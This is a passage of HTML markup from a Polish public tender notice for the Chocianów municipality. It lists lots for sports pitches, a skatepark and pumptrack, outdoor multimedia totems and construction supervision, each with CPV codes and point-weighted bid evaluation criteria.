Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty najkorzystniejszej dla cz. I-VII Zamawiający będzie się kierował następującymi kryteriami:<br/>a)	cena ofertowa – 60 pkt (waga kryterium wyrażona w punktach)<br/>b)	okres gwarancji – 30 pkt (waga kryterium wyrażona w punktach)<br/>c)	czas usunięcie usterek w okresie gwarancji – 10 pkt (waga kryterium wyrażona w punktach)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas usunięcie usterek w okresie gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 7.5.	7.5.	CZĘŚĆ V – Budowa boisk wielofunkcyjnych zgodnie z Programem funkcjonalno–użytkowym opracowanym przez JS ARCHITEKCI, ul. Benedyktyńska 15/23-25, 50-350 Wrocław oraz wytycznymi Zamawiającego w zakresie wymiany nawierzchni boisk wielofunkcyjnych przy ul. Środkowej i Wesołej w Chocianowie.<br/>a) opracowanie pełnobranżowych dokumentacji projektowych wraz z uzyskaniem wymaganych prawem opinii, uzgodnień, zgód i pozwoleń w tym pozwolenia na wykonanie robót budowlanych (pozwolenie na budowę , zaświadczenie o niewniesieniu sprzeciwu),<br/>b) zakres następujących zadań: przebudowa nawierzchni boiska wielofunkcyjnego przy ul. Wesołej, przebudowa nawierzchni boiska wielofunkcyjnego przy ul. Środkowej został opisany jedynie w SWZ, a dokumenty pomocnicze (mapy, zdjęcia itp. stanową załączniki do SWZ, <br/>c) ilość lamp solarnych należy przyjąć zgodnie z opisem w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45212220-4 - Roboty budowlane związane z wielofunkcyjnymi obiektami sportowymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty najkorzystniejszej dla cz. I-VII Zamawiający będzie się kierował następującymi kryteriami:<br/>a)	cena ofertowa – 60 pkt (waga kryterium wyrażona w punktach)<br/>b)	okres gwarancji – 30 pkt (waga kryterium wyrażona w punktach)<br/>c)	czas usunięcie usterek w okresie gwarancji – 10 pkt (waga kryterium wyrażona w punktach)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas usunięcie usterek w okresie gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 7.6.	Część VI Budowa skateparku wraz z pumptrackiem w Chocianowie (dz. nr 183, obręb 3<br/>Chocianów) zgodnie z Programem fudnkcjonalno-użytkowym opracowanym przez JS ARCHITEKCI, ul. Benedyktyńska 15/23-25, 50-350 Wrocław oraz wytycznymi Zamawiającego.<br/>7.6.1.	Zakres zadania obejmuje miedzy innymi:<br/>a)	opracowanie pełnobranżowych dokumentacji projektowych wraz z uzyskaniem wymaganych prawem opinii, uzgodnień, zgód i pozwoleń w tym pozwolenia na wykonanie robót budowlanych (pozwolenie na budowę , zaświadczenie o niewniesieniu sprzeciwu),<br/>b)	budowę skateparku o nawierzchni utwardzonej betonowej z urządzeniami i przeszkodami przeznaczonymi dla osób poruszających się na z rowerach BMX i hulajnogach, rolkach i deskorolkach, <br/>c)	budowę ścieżek komunikacyjnych utwardzonych kostka betonową,<br/>d)	budowę strefy relaksu z mała architekturą, zielenią niska i średnią,<br/>e)	oświetlenie terenu trzema lampami solarnymi w tym dwie zintegrowane z kamerami obrotowymi.<br/>f)	dodatkowo na działce nr 183 (pomiędzy boiskiem a budynkiem Sali gimnastycznej szkoły należy zaprojektować i zamontować modułowy pumptrack dla małych dzieci z gotowych elementów montowanych na nawierzchni trawiastej. Powierzchnia terenu przeznaczonego do montażu pumptracka wynosi 283 m2 (9,5 m x 30 m). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45212220-4 - Roboty budowlane związane z wielofunkcyjnymi obiektami sportowymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty najkorzystniejszej dla cz. I-VII Zamawiający będzie się kierował następującymi kryteriami:<br/>a)	cena ofertowa – 60 pkt (waga kryterium wyrażona w punktach)<br/>b)	okres gwarancji – 30 pkt (waga kryterium wyrażona w punktach)<br/>c)	czas usunięcie usterek w okresie gwarancji – 10 pkt (waga kryterium wyrażona w punktach)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas usunięcie usterek w okresie gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 7.7.	CZĘŚĆ VII – MULTIMEDIALNE TOTEMY DWUSTRONNE do użytku zewnętrznego, do wyświetlania informacji turystycznych, tras rowerowych, dostępnych boisk, terenów<br/>rekreacyjnych, itp.<br/>7.7.1.	Zakres VII części obejmuje dostawę i montaż 5 sztuk zewnętrznych totemów multimedialnych w tym:<br/>1)	uzyskanie warunków przyłączenia do sieci energetycznej,<br/>2)	uzgodnienie z Zamawiającym ostatecznych miejsc montażu totemów, <br/>3)	uzgodnienie z Zamawiającym <br/>4)	dostawa i montaż totemów o parametrach nie gorszych niż:<br/>a)	przekątna ekranu nie mniejsza niż 49 &#39;&#39;<br/>b)	jasność min. 3000 cd/m2<br/>c)	tryb i czas pracy: 24/7<br/>d)	minimalna rozdzielczość: 1920 x 1080 Full HD <br/>e)	minimalne proporcje obrazu: 16:9<br/>f)	minimalny kąt widzenia 178o / 178o <br/>g)	orientacja pionowa<br/>h)	zabezpieczenie ekranu: szkło hartowane (bezpieczne, wandaloodporne)<br/>i)	kontrola temperatury: ogrzewacz z termostatem<br/>j)	komputer: Inter i5, 8GB RAM, 256 GB SSD, LAN, Wi-Fi, Windows 10 Pro<br/>k)	oprogramowanie: do zarzadzania treścią LG Super Sign – do uzgodnienia z Zamawiającym<br/>l)	obudowa wolnostojąca, wodoszczelna, odporna na wandalizm, w kolorze uzgodnionym <br/>z Zamawiającym<br/>m)	dostęp serwisowy<br/>n)	temperatura pracy min. -30oC do 50oC<br/>o)	wilgotność pracy: 10% - 80% <br/>5)	Wstępne lokalizacje miejsc do montażu totemów zostały wskazane na mapach stanowiących załączniki do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32322000-6 - Urządzenia multimedialne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty najkorzystniejszej dla cz. I-VII Zamawiający będzie się kierował następującymi kryteriami:<br/>a)	cena ofertowa – 60 pkt (waga kryterium wyrażona w punktach)<br/>b)	okres gwarancji – 30 pkt (waga kryterium wyrażona w punktach)<br/>c)	czas usunięcie usterek w okresie gwarancji – 10 pkt (waga kryterium wyrażona w punktach)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas usunięcie usterek w okresie gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 7.8.	CZĘŚĆ VIII – NADZÓR INWESTORSKI NAD REALIZACJĄ Części I - Przebudowa budynku przy ul. 3 Maja w Chocianowie pod potrzeby utworzenia Centrum Informacji Turystycznej zgodnie z dokumentacją projektową i specyfikacjami wykonania i odbioru robót budowlanych, obejmująca między innymi:	<br/>a) adaptację budynku przy ul. 3 Maja 4 pod potrzeby utworzenia Chocianowskiego Centrum Informacji Turystycznej w tym wykonanie robót rozbiórkowych, przebudowę pomieszczeń, schodów oraz wykonanie innych robót budowlanych w budynku,	<br/>b)	wymianę stolarki drzwiowej i okiennej,	<br/>c)	wykonanie robót izolacyjnych,<br/>d)	przebudowę wewnętrznych instalacji: elektrycznej, teletechnicznej, domofonowej, wodnej i kanalizacyjnej, wentylacyjnej i ogrzewania budynku, budowę instalacji fotowoltaicznej,<br/>e)	zagospodarowanie terenu przy budynku,	<br/>f)	budynek znajduje się w wykazie zabytków dawnego województwa legnickiego – powiat polkowicki – gm. Chocianów, pozycja nr 106, teren znajduje się w strefie „OW” ochrony archeologicznej i strefie „U” ochrony układu przestrzennego miasta.	<br/>g)	przed budynkiem od strony ul. Fabrycznej należy ująć montaż dwóch urządzeń siłowni zewnętrznej – rower i wioślarz,	<br/>h)	dostawa i montaż monitora (telewizora ) z komputerem do wyświetlania informacji turystycznych (dla monitora i komputera należy zapewnić doprowadzenie zasilania elektrycznego). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71700000-5 - Usługi nadzoru i kontroli</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">4.	Przy wyborze oferty najkorzystniejszej dla cz. VIII-XI Zamawiający będzie się kierował następującymi kryteriami:<br/>d)	cena ofertowa – 60 pkt (waga kryterium wyrażona w punktach)<br/>e)	doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego – 40 pkt (waga kryterium wyrażona w punktach)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 7.9.	CZĘŚĆ IX - NADZÓR INWESTORSKI NAD REALIZACJĄ Częścią II Przebudowa pomieszczeń w świetlicy wiejskiej w Brunowie z wydzieleniem Sali do ćwiczeń fitness – zakres zadania obejmuje: pełnienie funkcji inspektora nadzoru inwestorskiego w branży: konstrukcyjno-budowlanej, sanitarnej w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych.<br/>7.9.1.	Zakres robót został opisany w PFU i obejmuje:<br/>a)	opracowanie kompletnych wielobranżowych dokumentacji projektowo – kosztorysowych wraz z uzyskaniem wszelkich wymaganych przepisami prawa opinii, uzgodnień, decyzji i pozwoleń w tym pozwolenia na budowę, tj. między innymi: projekty budowlane i wykonawcze, specyfikacje techniczne wykonania i odbioru robót budowlanych,	<br/>b)	przed złożeniem wniosku w Administracji Budowlanej Wykonawca musi bezwzględnie uzyskać od Zamawiającego ostateczną akceptacje dokumentacji projektowej, która powinna obejmować: <br/>- remont elewacji budynku,	<br/>- przebudowę pomieszczeń w budynku w celu wydzielenia Sali fitness wraz z jej wyposażeniem,<br/>- przebudowę schodów zewnętrznych i wewnętrznych,	<br/>- wydzielenie sanitariatów,	<br/>- wentylację pomieszczeń. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71700000-5 - Usługi nadzoru i kontroli</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">4.	Przy wyborze oferty najkorzystniejszej dla cz. VIII-XI Zamawiający będzie się kierował następującymi kryteriami:<br/>d)	cena ofertowa – 60 pkt (waga kryterium wyrażona w punktach)<br/>e)	doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego – 40 pkt (waga kryterium wyrażona w punktach)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 10</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 7.10.	CZĘŚĆ X - NADZÓR INWESTORSKI NAD REALIZACJĄ Częścią V – Budowa boisk wielofunkcyjnych zgodnie z Programem funkcjonalno–użytkowym opracowanym przez JS ARCHITEKCI, ul. Benedyktyńska 15/23-25, 50-350 Wrocław oraz wytycznymi Zamawiającego w zakresie wymiany nawierzchni boisk wielofunkcyjnych przy ul. Środkowej i Wesołej w Chocianowie.	<br/>7.10.1.	Zakres następujących zadań: przebudowa nawierzchni boiska wielofunkcyjnego przy ul. Wesołej, przebudowa nawierzchni boiska wielofunkcyjnego przy ul. Środkowej został opisany jedynie w SWZ, a dokumenty pomocnicze (mapy, zdjęcia itp. Stanowi załączniki do SWZ, ilość lamp solarnych należy przyjąć zgodnie z opisem w SWZ.<br/>7.10.2.	Zakres zadania obejmuje:<br/>a)	budowę boiska wielofunkcyjnego w m. Szklary Dolne.<br/>b)	Przebudowę nawierzchni boiska wielofunkcyjnego przy ul. Wesołej w Chocianowie.<br/>c)	Przebudowę nawierzchni boiska wielofunkcyjnego przy ul. Środkowej w Chocianowie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71700000-5 - Usługi nadzoru i kontroli</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">4.	Przy wyborze oferty najkorzystniejszej dla cz. VIII-XI Zamawiający będzie się kierował następującymi kryteriami:<br/>d)	cena ofertowa – 60 pkt (waga kryterium wyrażona w punktach)<br/>e)	doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego – 40 pkt (waga kryterium wyrażona w punktach)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 11</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 7.11.	CZĘŚĆ XI - NADZÓR INWESTORSKI NAD REALIZACJĄ Częścią VI – Budowa skateparku wraz z pumptrackiem w Chocianowie (dz. nr 183, obręb 3 Chocianów) zgodnie z Programem funkcjonalno-użytkowym opracowanym przez JS ARCHITEKCI, ul. Benedyktyńska 15/23-25, 50-350 Wrocław oraz wytycznymi Zamawiającego.<br/>7.11.1.	Zakres robót do wykonania obejmuje między innymi:<br/>a)	budowę skateparku o nawierzchni utwardzonej betonowej z urządzeniami i przeszkodami przeznaczonymi dla osób poruszających się na z rowerach BMX i hulajnogach, rolkach i deskorolkach, <br/>b)	budowę ścieżek komunikacyjnych utwardzonych kostka betonową,<br/>c)	budowę strefy relaksu z mała architekturą, zielenią niska i średnią,<br/>d)	oświetlenie terenu trzema lampami solarnymi w tym dwie zintegrowane z kamerami obrotowymi.<br/>e)	dodatkowo na działce nr 183 (pomiędzy boiskiem a budynkiem Sali gimnastycznej szkoły należy zaprojektować i zamontować modułowy pumptrack dla małych dzieci z gotowych elementów montowanych na nawierzchni trawiastej. Powierzchnia terenu przeznaczonego do montażu pumptracka wynosi 283 m2 (9,5 m x 30 m). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71700000-5 - Usługi nadzoru i kontroli</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">4.	Przy wyborze oferty najkorzystniejszej dla cz. VIII-XI Zamawiający będzie się kierował następującymi kryteriami:<br/>d)	cena ofertowa – 60 pkt (waga kryterium wyrażona w punktach)<br/>e)	doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego – 40 pkt (waga kryterium wyrażona w punktach)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span 